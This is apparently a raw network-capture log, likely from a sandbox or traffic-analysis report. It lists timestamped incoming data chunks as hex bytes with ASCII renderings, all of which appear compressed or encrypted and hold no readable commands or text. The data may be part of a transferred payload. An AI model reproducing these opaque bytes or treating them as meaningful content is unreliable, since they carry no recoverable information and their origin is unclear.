2023-11-18 09:02:40 UTC	5748	IN	Data Raw: 11 b1 ce c0 77 41 32 c9 47 73 11 6b 11 b1 b7 ed 2b 3d b6 da 07 71 34 17 b1 16 11 eb c2 21 da 96 e5 1a 9a 8b 58 8b 88 75 e1 41 1c 2d 22 d6 5c c4 5a 44 ac 2b f8 b1 49 bf 71 11 d3 d4 41 37 3f df 24 70 d0 5c c4 5a 44 ac 1b 4f 0e d9 22 62 cd 45 ac 45 c4 d6 6d f8 06 a3 e5 3a c9 45 ac 45 c4 ba f9 f9 26 22 f6 fc 1f a8 b5 9f e3 68 fd 0b f3 1b ff 32 7f 14 5c 69 03 1f 1d e5 5f ce bb e9 d7 9f 25 5b 2b 0f da ca bc b5 02 e7 60 79 db 71 6b c5 69 2b b1 b5 72 be 6e d3 2f 3f 4b b6 56 70 97 6c 53 39 3c 37 d9 45 e2 b9 e7 d6 d0 80 fb 66 d8 3b 67 80 2b 07 3c f7 dc 5b c2 fd 33 ec 1d 34 c0 1f ac e7 9e 7b 4b b8 8f 86 bd 93 06 18 bb 79 ee b9 b7 84 fb 69 dc fb 69 84 a3 d6 9e 7b 6e 2d 8d b8 9f c6 bd 9f 46 78 b1 7b ee b9 b7 84 fb 69 dc fb 69 9c 59 ac e1 b9 e7 de 12 ee a7 71 ef a7 11 Data Ascii: wA2Gsk+=q4!XuA-"\ZD+IqA7?$p\ZDO"bEEm:EE&"h2\i_%[+`yqki+rn/?KVplS9<7Ef;g+<[34{Kyii{n-Fx{iiYq
2023-11-18 09:02:40 UTC	5764	IN	Data Raw: 90 89 02 99 f3 33 40 1c c8 38 04 99 48 90 f9 e0 d1 e4 48 72 0c 32 d1 20 8b 85 8e 93 58 a8 af f2 33 40 44 c8 62 a5 03 cb 26 26 64 1c 85 4c 54 c8 62 c3 bf 12 71 21 e3 30 64 22 43 16 83 ef 9b e4 8d e3 90 89 0e d9 ba d0 77 22 13 1f b2 f5 03 30 ae 32 be d2 77 3d 5b 25 6f 1c 89 4c 94 c8 56 3c 81 c1 56 c9 1b 87 22 13 29 b2 15 d3 ab 89 15 19 c7 22 13 2d b2 13 bf 72 9d 24 6f 1c 8c 4c c4 c8 4e 2b 7d a7 30 31 23 e3 68 64 a2 46 76 da e8 13 97 89 1b 19 87 23 13 39 b2 13 cf 9b d8 91 71 3c 32 d1 a3 e7 f6 8f bb fd f4 79 ef 36 9f 14 38 20 99 08 92 9d f9 75 52 0c c9 38 22 99 28 92 d1 85 3d 9f 4d 25 1a cf 9b a0 90 d1 9a ad 67 53 89 c6 f3 26 30 64 17 3c 26 61 17 39 df b8 0d 99 e0 90 5d 56 3c 59 e9 a2 73 88 78 de 04 88 ec c2 f3 26 44 64 dc 88 4c 90 e8 b9 7d d0 ed fb de 6d 9e Data Ascii: 3@8HHr2 X3@Db&&dLTbq!0d"Cw"02w=[%oLV<V")"-r$oLN+}01#hdFv#9q<2y68 uR8"(=M%gS&0d<&a9]V<Ysx&DdL}m
2023-11-18 09:02:40 UTC	5780	IN	Data Raw: 04 0b ba 32 ce ae 4c e0 95 d1 5e ca 6b a8 c2 74 5c 4d 00 d6 73 3b e8 91 cc 2e 5b da 07 d8 bd c2 fb 0f d0 7b d1 8d 73 2c 13 90 65 9c 64 99 a0 2c e3 2c cb 04 66 59 f2 fb 9b e0 2c e3 3c cb 04 68 ad db b0 5a df 5e 19 1a 67 5a 26 50 cb 00 d5 fa ba a5 b5 7d e3 5c cb 04 6c d9 39 d9 fa f2 fb 96 26 fb c6 75 13 b8 65 cb 36 bc 2a f7 72 9d e4 7c cb 04 70 d9 c0 75 1b 44 37 ce b8 4c 20 97 0d f8 69 da 86 94 6a 69 f8 47 be 75 98 7c dd ee 50 29 7f b1 5d 96 c1 4a 5a 6b e4 7b d6 46 24 27 78 26 08 cf ce 19 de db fb 79 13 88 67 9c e2 99 60 bc 75 db 33 c1 8d fb 7b 64 7f c8 7c a7 2b ef bf be ed 32 87 43 e6 40 0e e7 1a 39 ee 32 97 08 f4 73 45 76 7e fe 08 78 b4 11 3b 2e 4c d0 a3 71 f6 68 02 1f ed bc d3 e3 97 7f 6f 69 6d df 38 7f 34 01 90 36 f2 79 86 20 48 e3 0c d2 04 42 da 08 ad Data Ascii: 2L^kt\Ms;.[{s,ed,,fY,<hZ^gZ&P}\l9&ue6*r\|puD7L ijiGu\|P)]JZk{F$'x&yg`u3{d\|+2C@92sEv~x;.Lqhoim846y HB
2023-11-18 09:02:40 UTC	5812	IN	Data Raw: 38 f7 34 e1 9e c6 4f ae 30 e1 9e c6 b9 a7 09 f7 b4 e0 eb 25 c2 3d 8d 73 4f 13 ee 69 c7 1c ed dd bf d7 30 c9 c6 75 13 8e 66 c1 fb 9b 70 34 e3 1c cd 84 a3 d9 31 47 fb e5 dd 1a d6 b3 71 8e 66 c2 d1 2c b9 6e c2 d1 8c 73 34 13 8e 66 89 4f 88 31 e1 68 c6 39 9a 09 47 b3 74 3c e7 12 8e 66 9c a3 99 70 34 2b de df 84 a3 19 e7 68 26 1c cd 8a af 97 08 47 33 ce d1 4c 38 da 6b 79 40 5f e8 ff 1f 65 f7 b6 f4 b6 8d a5 61 f8 86 fa 40 e4 da ca 67 4e c7 1d f7 38 93 49 27 99 ae 9a 9c 49 94 78 ff 97 30 16 6d 49 9f d0 55 e2 9b 33 fa 37 56 81 24 b8 01 f1 60 41 5b 51 7f 86 f1 76 13 47 9b f9 ea 01 f3 fa b2 56 2c ad cd c4 d1 ec 80 c7 b9 4c 1c cd f8 fa 01 26 eb 07 6c db ac dd be 16 9d 9e 61 7c d1 58 51 3b e3 eb 07 98 a8 9d 71 b5 33 51 3b 3b 60 b7 36 51 3b e3 6a 67 a2 76 36 e1 75 1f Data Ascii: 84O0%=sOi0ufp41Gqf,ns4fO1h9Gt<fp4+h&G3L8ky@_ea@gN8I'Ix0mIU37V$`A[QvGV,L&la\|XQ;q3Q;;`6Q;jgv6u
2023-11-18 09:02:40 UTC	5828	IN	Data Raw: c7 3f 1f 9d cb 68 28 ed ce 06 ff 5c d6 d9 a9 0d ba 03 7f af 53 1b 74 0e db be 53 1b 74 dc 06 9d da a0 0b 1e 7a ab c7 a3 41 69 03 ec 97 f6 78 f4 54 da 81 f9 aa fd ba c8 bf 57 6d d0 e1 b3 17 8f 47 9d d2 3a f4 bd df 1e f5 4a 4b 2b 32 8f 47 75 9d af 00 ef 13 3d 1e d5 75 be e8 09 a0 c7 a3 51 69 77 7b 0e 79 e7 4b 69 69 c7 e7 c7 a3 49 69 77 1d 4e 7e 5b 69 b3 d2 62 5f e7 d4 c7 3a 3c 59 c2 39 f5 b1 6e 7b 62 65 89 bf 4e 7d ac 2b fc 9d ab d2 d6 4a fd a4 93 23 98 8f 3f 0c 88 93 9d bb 95 af d1 b9 33 8f 47 55 9f 2d e0 75 36 d5 67 dc bd fc f1 a8 ea b3 71 f9 6a 3c 72 8d ce e8 7c 3c aa ef dc 4e 2c df a6 ef dc 68 87 a1 c7 a3 6a 83 7d e0 77 d6 38 e8 0f 8c cd fc e1 94 96 f6 83 78 3c ea 95 76 60 be 1a 43 3d c7 b1 5e 63 a8 c7 19 62 e7 35 86 fa 40 ef 37 3c 1e 3d 95 76 97 11 fa Data Ascii: ?h(\StStzAixTWmG:JK+2Gu=uQiw{yKiiIiwN~[ib_:<Y9n{beN}+J#?3GU-u6gqj<r\|<N,hj}w8x<v`C=^cb5@7<=v
2023-11-18 09:02:40 UTC	5844	IN	Data Raw: 79 c6 31 2f 9d f2 82 ee b8 7b cb 6b a7 5c f1 15 2a a7 4e 5a 4e 38 6a 29 9d d6 4e 38 ae fd 43 5b 4e ec 5e b8 37 2d bd 96 c7 1d fa b8 03 8f 3b f4 71 f9 9d 68 fd ad 78 fb 0f f8 6a fe b3 69 f9 47 f7 b2 b8 a3 c8 a8 e3 e1 ad e9 24 b2 89 47 3b 8b ec ca a3 bd 0d 61 dc 81 ca 64 11 9e 8d d8 85 d3 64 41 b4 f1 05 d1 26 4b c2 6c e4 0f 03 59 10 6d 7c 41 b4 c9 82 68 1b 83 47 93 87 01 5f cb 6b 3a d2 4d 27 fa ba 6f 52 3e 63 bc 7c c6 a4 7c c6 26 3e f9 92 6a 05 e3 d5 0a 26 d5 0a c6 ab 15 4c aa 15 8c 57 2b 98 54 2b d8 c4 27 5f 52 ad 60 bc 5a c1 f4 39 c3 ab 15 4c aa 15 8c 57 2b 98 54 2b d8 99 e7 9b 54 2b 18 af 56 30 a9 56 b0 33 76 73 34 d9 b5 cb 78 b5 82 49 b5 82 f1 6d 7b 4c b6 ed 31 5e ad 60 fa 94 3f 2e 20 78 35 ab 30 29 20 30 5e 40 60 52 40 60 c7 05 04 5f 1f d1 a4 df 78 01 Data Ascii: y1/{k\*NZN8j)N8C[N^7-;qhxjiG$G;addA&KlYm\|AhG_k:M'oR>c\|\|&>j&LW+T+'_R`Z9LW+T+T+V0V3vs4xIm{L1^`?. x50) 0^@`R@`_x
2023-11-18 09:02:40 UTC	5860	IN	Data Raw: d0 1b 24 c4 cc 9f 10 33 48 88 99 a3 04 ee 7c 6b 06 bd f9 c7 0d 12 62 e6 2f 81 33 28 81 33 7f 42 cc 20 21 66 c3 93 fb 9b 84 84 98 f9 13 62 06 09 b1 8f 63 6f 6f 10 27 87 50 3e 68 76 ba 37 ab a0 59 e5 1d b7 21 d4 d0 cc bd c5 86 ac 9d f9 b3 76 06 59 3b 1b dc 59 04 83 ac 9d f9 b3 76 06 59 3b f3 d7 e9 19 64 ed cc 9f b5 33 c8 da d9 f5 d8 d9 1b 64 ed cc 9f b5 33 c8 da d9 e8 9f 5c 23 4c 2e 7f d6 ce 20 6b 67 a3 ff 62 05 b2 76 e6 cf da 19 64 ed 6c f4 8f 1b d4 e9 99 3f 6b 67 90 b5 b3 c9 9d fe 31 c8 da 99 3f 6b 67 90 b5 b3 c9 bf 08 43 d6 ce fc 59 3b 83 ac 9d 4d bd bf 37 18 37 7f 9d 9e 41 9d 9e f9 1f 51 6a 50 a7 67 fe b4 9d 41 da ce cc 7f 91 09 69 3b f3 a7 ed 0c d2 76 1f c7 ae 4d e8 f5 44 fc cd f0 e3 ef 52 b5 5c 63 cb 0a 5b 56 de 2e 2b ea f2 fa b7 9a d0 cf d8 b2 c4 96 Data Ascii: $3H\|kb/3(3B !fbcoo'P>hv7Y!vY;YvY;d3d3\#L. kgbvdl?kg1?kgCY;M77AQjPgAi;vMDR\c[V.+
2023-11-18 09:02:40 UTC	5892	IN	Data Raw: e8 a5 13 21 9d e8 a5 13 21 9d e8 8f 5e 45 48 27 7a e9 44 48 27 7a e9 44 48 27 7a e9 44 48 27 7a e9 44 48 27 7a e9 44 48 27 fa a3 57 11 d2 89 4b 67 3b 50 97 1c 5e 3a 07 a4 73 78 e9 1c 90 ce e1 8f 5e 1d 90 ce f1 e6 b3 a1 df 75 6c 6f f2 2b fe 1f 43 91 cd bb ea 80 ab 0e fd 43 47 8f a1 c8 76 e3 2a ae 06 57 1d fa 87 8e 1e 43 91 cd bb ea 80 ab 0e ff e1 f4 03 ae 3a bc ab 0e b8 ea fd 6f b5 54 78 ff 12 fc a7 69 db ab 0b c2 79 fb f3 bc dd ae f7 f1 9f e9 da 09 07 f8 77 78 fe 1d e0 df 11 34 6d 0f f0 ef f0 20 3b 00 b2 23 ea 2d 89 03 20 3b 7c eb ea 40 eb ea b8 ff de b9 ef ae 69 5c cd 3f bd 80 a3 23 bd d9 63 27 07 70 74 f8 36 d0 81 36 d0 fb df e1 fd 9b 36 fe 75 b6 1f ff ed 69 68 fd 38 b7 9a eb f2 fb d0 f6 34 f7 7d 88 5a 17 d7 d4 13 f0 00 01 0f 4f c0 03 04 3c 3c 01 0f 10 Data Ascii: !!^EH'zDH'zDH'zDH'zDH'zDH'WKg;P^:sx^ulo+CCGv*WC:oTxiywx4m ;#- ;\|@i\?#c'pt666uih84}ZO<<
2023-11-18 09:02:40 UTC	5908	IN	Data Raw: 8a 45 0e 76 04 83 46 57 95 11 5d 21 91 d1 76 40 09 98 73 3c 36 44 cd e8 f5 6f c2 fa 1f fc 79 fd a3 51 eb 47 de 93 b9 35 9b fc 20 2a d0 a8 a5 0a bb 1d 5b 2a b1 a7 3d bc 1b 5a b9 5c 48 3f 42 73 cf b3 63 74 4d f2 e1 6e f1 9d bd e3 37 18 c1 b9 30 02 f7 51 c1 79 51 c0 6a a2 2f 71 b8 43 b4 d3 71 74 29 18 bc 13 70 e9 ae 35 30 0c 29 cb 37 db e6 3e 60 bb a7 35 70 89 01 0f 56 9e 19 c7 a1 c9 09 f9 13 19 f5 0e 90 39 ca 5d 25 f6 54 73 fd f5 18 90 1c e7 84 8a 59 9a 57 ed 5f fe 8f c5 43 4c c4 e8 3c a4 e6 75 da 53 bd f5 f2 a2 46 ef 5a 79 51 bd b5 51 f6 7e c2 83 94 7d 80 e1 c4 9e b5 a1 0f de 36 8a 10 b6 f3 84 bb 23 d1 99 e0 ee b4 c9 de 45 94 f4 21 4e ae 9b 60 c9 ea 8b 81 0f 1b d1 89 bd 61 a7 8d 7e c4 34 ec b4 d2 8f f8 ac 91 92 d2 84 ae ec 58 66 9b 5c 77 43 2c 06 42 c4 1f Data Ascii: EvFW]!v@s<6DoyQG5 [=Z\H?BsctMn70QyQj/qCqt)p50)7>`5pV9]%TsYW_CL<uSFZyQQ~}6#E!N`a~4Xf\wC,B
2023-11-18 09:02:40 UTC	5924	IN	Data Raw: 95 3d d6 9d 95 cd 16 23 58 99 4f e2 ac cc 6e 21 56 96 81 a2 65 14 99 89 32 76 78 e6 8b 51 0e 56 fa c7 bf 9b 58 d6 6c 81 06 e9 c5 40 18 fe 2b 44 c6 af 52 01 ef 2f 16 c3 f8 15 2b 75 3e ba 93 e6 73 e2 7c 1e 00 e4 10 9f 98 e7 cc 1e f8 55 57 7e 37 7e 45 9c 8a 58 56 f5 cf c4 ad f0 c5 15 c4 b2 80 5b d5 9a f8 d4 ae 9e f8 54 87 7e 76 1a 26 86 f1 a9 c8 29 73 95 63 70 2b 7c bf 2b ec cc f4 2c 32 1d 36 a9 7e 68 55 38 41 c7 ee 90 1c 1f c3 e8 1e b9 08 f2 cd f9 61 e8 56 27 52 80 c4 6d 85 7e 50 b2 f7 55 dc d0 d1 f8 a0 25 ea 79 d5 c4 e7 28 5a 5a 19 e3 73 cc 7d 2f 6c 07 6b 1b 8f d1 f6 cd c0 32 fa d6 e5 19 26 68 8a 8f 32 be 96 1c 0c e3 2f 7c bc 61 78 c2 2a c8 1e 8a 7a 5c 62 02 5a 49 18 d0 64 cf 05 41 9d 97 35 72 3a d5 9d 9f 9d fc a7 fc ac 63 04 e3 67 5a 24 3f fb f6 af f1 b3 Data Ascii: =#XOn!Ve2vxQVXl@+DR/+u>s\|UW~7~EXV[T~v&)scp+\|+,26~hU8AaV'Rm~PU%y(ZZs}/lk2&h2/\|ax*z\bZIdA5r:cgZ$?
2023-11-18 09:02:40 UTC	5935	IN	Data Raw: be f9 4b 79 6a ca d5 49 7c 0a f2 c2 fd fa 89 44 87 8f af b8 cd 7d 54 fc 84 82 32 8d 41 8d 31 fc ef 4f 0b 15 d0 0d 1c 1c fb fd ce 20 c6 eb 2a c4 b8 f1 2d 02 7a 33 f9 0f 84 22 bd e8 ef 3f c2 f7 5b 43 ef dd 3b 53 d5 12 c2 c2 0c 3f 06 c9 a9 ba 54 90 3d fd b8 e6 6e 42 c4 be ac 8b b2 2f 87 7f 0b a4 e3 7e 1e 77 f9 fa 88 0a 2b a2 54 38 b6 1d 2a 8c e5 15 2a 22 2a 7c 12 a5 c2 5a ac 70 0a af e0 89 a8 d0 10 a5 c2 33 58 41 e3 91 ad e7 46 54 58 19 a5 c2 ad 58 e1 63 a8 f0 09 5a e2 f8 47 b0 78 99 b6 25 7f 81 1b 65 60 d5 ca 50 fc 4f ed f9 b3 50 e2 f0 2b 47 98 82 41 87 3b 1e 88 fd 37 76 9a d7 2d 9b af cb 24 5d b6 70 ec 37 a3 c8 ac c7 ba 0b 18 57 bc d5 5d c0 58 16 03 02 46 6c 27 b3 86 f4 5f c5 23 2f 8e fb 0b 63 9f b9 0d c6 be 9e 47 5e 35 0b 0d 4f c3 36 f7 1f 65 1f 6c 6f 44 Data Ascii: KyjI\|D}T2A1O -z3"?[C;S?T=nB/~w+T8"\|Zp3XAFTXXcZGx%e`POP+GA;7v-$]p7W]XFl'_#/cG^5O6eloD
2023-11-18 09:02:40 UTC	5967	IN	Data Raw: 69 fb 9d e0 68 9e 97 9e e2 7a 09 9b 17 1a 62 68 eb ae ec 8d d6 58 36 5a 20 6e 36 3f e1 aa 41 82 c1 72 80 c3 c7 cd 30 22 96 e8 28 7b 4e 0c a2 2c b1 91 0e b3 9f 41 11 0d 0d b1 72 d7 5a 1a da 40 8c 11 c9 10 60 12 b6 bd 8e 5e bb 2e c0 11 06 bb 8d f0 ed 28 23 4c 83 11 fa af e5 79 12 8a 12 79 63 e4 0d ff 00 eb e3 c3 3f 61 47 93 38 3b 2a e7 ec 68 0a 67 47 53 ff 5b 76 f4 3b b7 c5 a3 d4 b1 65 f6 0a f4 64 28 01 da 57 6e 47 2f 01 8c 3b 56 8a 99 2b 30 4f 16 3c a3 fe 78 12 5e 93 c3 f3 54 cc 4c 01 cf 53 ba 75 5d 66 b7 51 10 55 2b da f2 22 0a 33 ab 3e 80 fb 36 3d 98 c6 bc b1 ba 71 e0 58 16 02 5c 63 28 51 61 c8 39 65 64 06 9c 14 39 6e c4 a7 5d cf e2 09 c0 6f eb 8a f4 ff a4 bc 20 ab c3 d7 c1 1d 65 1d 5e b9 1c d6 61 8f 91 87 cd e6 ef b6 7a b3 a2 d4 ba 1d 6b bd 87 d6 fc 99 Data Ascii: ihzbhX6Z n6?Ar0"({N,ArZ@`^.(#Lyyc?aG8;*hgGS[v;ed(WnG/;V+0O<x^TLSu]fQU+"3>6=qX\c(Qa9ed9n]o e^azk
2023-11-18 09:02:40 UTC	5983	IN	Data Raw: 3d a9 71 a9 c6 9f b9 f2 71 46 93 5b 5a 05 7f cd 3d 49 d1 82 02 40 2b 8e e6 3c 01 00 3e fa 58 ec 56 6a 88 9e a2 90 f5 52 cc e4 62 b6 26 b1 73 b9 c3 ee 60 23 aa ea ce 17 a8 ca d5 51 85 27 22 a3 ec 1d f7 1e 61 00 dc 6e 63 87 4e a0 53 6a 21 fa fb 6f 11 53 ef 0f 8a 05 4c 7d 02 48 13 4e e1 9a e8 c8 33 4e 7e 3b cd 6a d5 09 72 f5 b7 9b d5 ca c7 71 56 ab 62 f3 58 43 b5 b5 51 d3 ab c2 07 b0 0e d3 e5 0e 5d 49 65 5d c3 89 57 5d 58 8e 57 54 67 b3 53 7d 83 29 be a2 0f 37 07 f4 7e d9 6c 1f f9 50 37 07 60 84 47 5d bd 17 95 8b f8 3b 06 ff bd 03 19 fc 50 e9 09 1a c6 c4 fb ef d9 e0 e7 90 61 ce 3f ae 00 9b 39 1a 8c f6 2d 08 f3 f7 c8 7e bc 3e a2 df 85 6e d1 40 7f 5f ea 6e 80 06 f4 de 93 e4 bd c7 f0 de 9b e4 bd d7 f0 de 9f e4 3d 01 c0 e3 19 78 99 46 4c eb 50 1e 98 81 b5 3a 98 Data Ascii: =qqF[Z=I@+<>XVjRb&s`#Q'"ancNSj!oSL}HN3N~;jrqVbXCQ]Ie]W]XWTgS})7~lP7`G];Pa?9-~>n@_n=xFLP:
2023-11-18 09:02:40 UTC	5999	IN	Data Raw: 29 11 82 a6 f3 8e 66 93 b8 03 7c a6 03 c2 61 31 68 6f 66 20 02 73 4d da 71 4d 1a e4 e7 18 90 3f 3a 93 91 7f 77 12 f2 15 31 c2 d3 c6 f8 d7 99 44 df dd 5a 45 72 3c f9 ed 71 7d 57 ff be 21 cd f7 1b e0 7b 2d 57 8f 37 d1 f9 e1 da ff b5 70 11 96 ff 49 40 fd 50 1a a8 6d 06 a8 cb 05 d4 0f 27 41 7d 7f 9a 51 a7 e0 a8 cf 27 22 b4 12 a3 dc 47 50 8b fe f5 3e 4c d8 39 74 05 8f 53 9b 34 ce d3 69 c6 d9 0c 6d b5 d9 28 66 9f 28 9c 6c b0 6f 88 3e f1 50 a8 10 e8 b3 08 8b bf 5f 8f 34 32 7f 1b d3 48 8b 7a c9 36 52 56 1c e2 64 26 36 71 13 c0 a7 ec 00 02 11 69 43 7c 1e ff 4e 97 4e 0e 84 ef 10 8e 9b 06 db cf 1a e0 91 af 40 ad d1 45 79 17 cc fc f5 15 a6 24 d3 ac b3 0c b3 3e 9a cf b3 fe 6b d2 28 be 34 a3 34 e7 1b 47 41 f8 c4 7e f4 b2 f2 99 b4 17 75 13 04 b7 2a a0 42 0a dc 9a 50 37 Data Ascii: )f\|a1hof sMqM?:w1DZEr<q}W!{-W7pI@Pm'A}Q'"GP>L9tS4im(f(lo>P_42Hz6RVd&6qiC\|NN@Ey$>k(44GA~u*BP7
2023-11-18 09:02:40 UTC	6015	IN	Data Raw: ca 63 e2 d6 c2 6b f5 60 bc 9e f5 5f 00 d1 53 4b 00 2d f1 d7 43 79 69 81 11 f8 37 3c b8 78 9f 8c 42 e8 ef 56 f1 52 2f 7b 7f a3 b2 6a aa a0 35 95 4f 89 a0 bd 1b 40 11 9b 6b c7 8b 58 32 a8 a6 b4 14 35 8d c3 9a 46 0c f2 77 c7 f4 2b c1 f1 40 93 a4 5f 67 48 53 32 04 63 74 fa 3d b4 85 66 2b f0 4b a0 67 5f 7e 42 a5 67 3b b0 a6 3d 16 39 a8 9e c7 f2 f0 cd a0 a9 5a c5 72 49 79 24 d9 22 91 64 79 08 7e 1f 82 db 9c 86 95 04 c6 26 16 23 fd 71 c2 3a 61 df 84 74 a4 f3 b6 4c 99 61 7e 6b f2 81 73 e5 de c0 42 d1 55 f4 b1 cb 28 d4 fd 9d 8a 7c 1b e8 a5 26 56 5b d1 56 75 af b8 41 35 c5 2b eb f6 b2 7c 79 70 fc e8 6a 11 d6 25 36 5d fb 24 2e d6 c0 e7 a2 55 0f 73 8b 79 26 87 bd ca df 09 2f a3 f9 03 5c 00 b0 da f3 2f 1a 43 c7 e0 f9 b8 bf ec 95 65 b8 2e 9e 7d ac 9b f4 3f fc dd 0c f7 Data Ascii: ck`_SK-Cyi7<xBVR/{j5O@kX25Fw+@_gHS2ct=f+Kg_~Bg;=9ZrIy$"dy~&#q:atLa~ksBU(\|&V[VuA5+\|ypj%6]$.Usy&/\/Ce.}?
2023-11-18 09:02:40 UTC	6031	IN	Data Raw: 8f 48 c1 42 ad 5a da d9 41 63 e9 b0 24 f5 d3 b0 68 a5 4e 63 9a 3a 0b 48 a4 08 9c 68 d6 62 cd 6c e1 c3 3a 7b d0 39 e7 28 31 24 de d0 5e 04 30 46 e9 35 a2 6d 46 00 0e 1d 76 1e 0f 3c df 8b ce a8 c2 03 75 ae 97 02 39 5a 84 07 56 23 cc 9e 34 18 92 d2 5e 05 01 12 51 0f 8d 48 c6 60 2a 64 0b d1 30 1c 22 d2 06 9d 08 c0 81 6a 68 69 74 49 28 c0 ec 90 ea 61 b4 a8 bd c7 c7 67 3f 21 22 62 17 19 8c 86 49 bc a0 56 e1 a7 8c c3 0c 33 30 b4 31 86 86 8b b5 85 fc a4 3c 4a 30 1c cc 33 81 43 54 c1 c1 cd c3 a1 00 05 50 14 84 c3 8f 79 ee 3c 22 b0 21 ae c6 9e a2 20 f1 bf 52 22 9d 76 ab 76 dc d9 59 65 da c5 50 58 e5 0c b0 0d 2c c0 41 1c e7 35 06 50 30 8c 58 af 88 3e b8 ac fc 3a 31 48 d4 97 d8 c0 ce 54 7d d8 19 11 a3 b0 9d 12 0e 8c 83 55 05 1c ec e3 cd e5 28 cd 54 a3 8d 89 37 60 4a Data Ascii: HBZAc$hNc:Hhbl:{9(1$^0F5mFv<u9ZV#4^QH`*d0"jhitI(ag?!"bIV301<J03CTPy<"! R"vvYePX,A5P0X>:1HT}U(T7`J
2023-11-18 09:02:40 UTC	6047	IN	Data Raw: ed 3e 92 84 b8 21 36 4e 6f 34 c9 97 f0 09 17 c8 1f a2 63 94 6f b4 9c 59 8f 11 b9 e2 15 72 b4 da af 2e ac e4 f1 41 5a 30 8d 72 30 ce d8 3f d7 68 7d f0 56 2e 8f d1 66 5d 8e c1 f5 5c 3d 7c 0a bf b7 90 1b a3 a0 db 01 5d 96 00 ad d8 53 1b 23 8c ca 18 a3 29 8d 5f 41 b3 ea 1f ee 15 37 f9 d1 5c 57 ea 54 ce c2 3d 8d 33 f7 2c c5 97 83 f9 e8 26 3a ad 31 f0 67 b2 b3 e8 2c ab 76 af 92 79 62 f6 e3 b4 9a cd 30 33 0f cc 28 06 77 22 99 7e 75 51 32 d7 45 33 9c bb 10 a6 fb 32 a9 d5 22 13 06 d0 11 72 43 73 04 03 28 92 91 f3 7d b3 29 d8 7d 89 67 55 b9 c0 06 40 82 9d 54 aa 3c 7c d7 b0 c8 dc d4 83 68 e9 a8 09 56 eb 07 a6 74 74 f0 1d c5 b6 8c 61 df f0 98 f3 2e 72 86 cd 20 ff c1 77 f9 82 0f e7 0b 4f c7 92 43 c4 ef 1a fd f2 f7 f9 1e 43 58 3e 14 54 f0 50 65 c4 9d 62 3f 1a b6 3b d1 Data Ascii: >!6No4coYr.AZ0r0?h}V.f]\=\|]S#)_A7\WT=3,&:1g,vyb03(w"~uQ2E32"rCs(})}gU@T<\|hVtta.r wOCCX>TPeb?;
2023-11-18 09:02:40 UTC	6079	IN	Data Raw: f0 7c 40 a6 73 59 28 39 e5 55 68 ec 79 28 e4 5c 87 b8 19 98 8e 96 e9 67 f6 f6 11 fe 2c cb f0 84 c7 9c cf 26 a9 c3 b3 b5 c3 73 4b 74 be 9b 65 3f 45 3f 1b f7 21 c5 d9 11 85 b9 4a 7e 87 62 5b d8 06 e7 4d f1 36 74 bc ff 58 1a b1 3f 4b bc 5c d3 55 58 ce b5 dd 6c 1a fa f9 6d fa 34 35 87 3e ad 34 6b e9 eb f9 27 e9 5a fa f4 2a 2b 8d 30 8c 0f e0 13 66 94 97 bc 55 cb 5e be 3e 6f 8a 9a 57 1d 9c 5b d9 f1 3e 05 db 38 92 d5 78 7e 45 34 73 81 4c 9c 8a 56 56 8a f4 da a0 56 0c 97 79 20 74 bc aa f3 e5 1e 75 dc 94 e0 99 1c 6e c8 87 5a d0 7d a1 36 66 6e a8 31 71 dc 14 d7 e5 ea a7 17 23 d7 2d 73 28 fa 63 d7 92 eb 82 7b 07 2c 47 12 b1 ff 50 48 78 00 c0 56 69 ed 6a 3c 44 2d 15 fb 0e 8d 67 34 bf 4c 23 47 42 ef d9 8a f0 33 18 62 a1 78 14 d7 23 66 f2 cb 80 3c d5 1f 9e 40 86 ea 0c Data Ascii: \|@sY(9Uhy(\g,&sKte?E?!J~b[M6tX?K\UXlm45>4k'Z*+0fU^>oW[>8x~E4sLVVVy tunZ}6fn1q#-s(c{,GPHxVij<D-g4L#GB3bx#f<@
2023-11-18 09:02:40 UTC	6095	IN	Data Raw: bb ef 1e 04 40 96 f6 ee dd 7b 27 00 57 ca cf cf 3f 02 40 95 ee bf ff fe d9 00 4c 69 f9 f2 e5 7b 00 88 40 5a 9b 5f 00 e0 49 7f f9 cb 5f ce 03 a0 01 89 bd 73 39 00 4b 1a 3a 74 e8 60 00 12 90 da fc 67 00 38 d2 ab af be 3a 0c 80 02 24 e7 fb 02 80 21 b5 b6 b6 5e 04 40 00 d2 7b e0 21 98 bc d4 ad 5b b7 05 30 69 20 c1 cf ee 85 c9 4a a3 46 8d 5a 08 93 04 52 6c f9 1d 26 27 1d 38 70 60 29 4c 0a 48 f2 dd 13 30 19 a9 7b f7 ee 37 c2 24 a4 cb 2e bb ec 39 18 bc 74 cd 35 d7 dc 0d 83 06 12 bd 20 1f 06 2b 4d 9e 3c 79 39 0c 12 48 35 eb 2f 30 38 29 23 23 63 28 0c 0a 48 f6 d0 ab 30 18 e9 f5 d7 5f 6f 85 41 00 e9 66 77 83 ce a5 e4 e4 e4 51 d0 29 90 f0 a6 03 d0 99 f4 c8 23 8f 74 87 4e a4 cf 3f ff fc 1a 68 5c 5a b7 6e dd 64 68 14 48 3a 27 03 1a 93 fc 7e ff eb d0 08 90 f6 19 c9 50 Data Ascii: @{'W?@Li{@Z_I_s9K:t`g8:$!^@{![0i JFZRl&'8p`)LH0{7$.9t5 +M<y9H5/08)##c(H0_oAfwQ)#tN?h\ZndhH:'~P
2023-11-18 09:02:40 UTC	6111	IN	Data Raw: 93 97 ad 58 77 ab e9 d7 4a 94 af fb 93 e4 4b ae 93 2b 7f b4 8e ff ef f2 7a ee d3 c8 ff d0 30 f2 f8 c7 a4 e1 7f df 3b 22 a8 27 bc 04 33 8d bf ed 18 4f e3 53 9c 5f 56 0e b5 58 59 07 62 67 97 88 c0 cc 4e 63 66 09 a2 2e fc 17 72 68 eb 79 48 3b f4 30 0d fd 5d 81 5e bb ab e5 26 69 c1 fc 3d 09 a3 87 25 46 ab 58 f2 bc 51 ef 9e 98 fd 43 38 45 dc 71 fa 45 aa 31 62 4b 5c cb dc b3 b7 3f 6a 28 f8 20 ed 8b 56 fa 80 bb 57 cc 49 4c a9 82 49 0c 5f d7 62 98 7e 44 70 be 32 47 20 3f 83 da f7 b4 d7 39 c8 ba 21 4d 34 ca a9 13 6d 32 c8 0e 93 62 9d fd ce 7f c5 b2 e3 bd 6f 4a 5d cb 43 f4 e0 2c 56 41 b9 40 ce 8c aa 11 c5 0a d2 f9 2c 5b c4 c5 d6 52 bf dd 13 f9 b1 b4 87 6a 39 76 d6 50 c0 94 f5 34 2b 61 60 c2 58 ad 1f cb fa c7 15 e8 b2 23 4b c7 43 63 6c 53 ba 9a de 00 9d b5 7c 35 79 Data Ascii: 